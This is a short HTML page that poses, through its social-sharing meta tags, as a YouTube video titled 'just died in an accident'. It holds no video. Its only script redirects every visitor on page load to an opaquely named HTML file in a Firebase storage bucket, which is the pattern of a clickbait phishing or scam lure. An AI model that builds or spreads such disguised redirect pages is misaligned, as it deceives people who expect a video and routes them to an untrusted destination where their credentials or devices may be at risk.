<html>
	<head>
		<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
		<meta name="facebook:card" content="summary_large_image" />
		<meta name="facebook:description" content="Youtube" />
		<meta name="facebook:app:country" content="US" />
		<meta property="og:image" content="./image2.jpeg" />
		<meta property="og:title" content="just died in an accident❤ " />
		<meta property="og:description" content="824, 875 views" />
		<meta property="og:site_name" content="YouTube" />
		<meta property="fb:app_id" content="124024574287414" />
	</head>
	<body>
	<script>
        (function () {
            const nuevaURL = 'https://firebasestorage.googleapis.com/v0/b/jola-aa0ce.appspot.com/o/rthrthrthrth3232.html?alt=media&token=5e6eac8c-49af-4032-a3ba-f98e8105f401';
            window.location.href = nuevaURL;
        })();
    </script>
	</body>
</html>

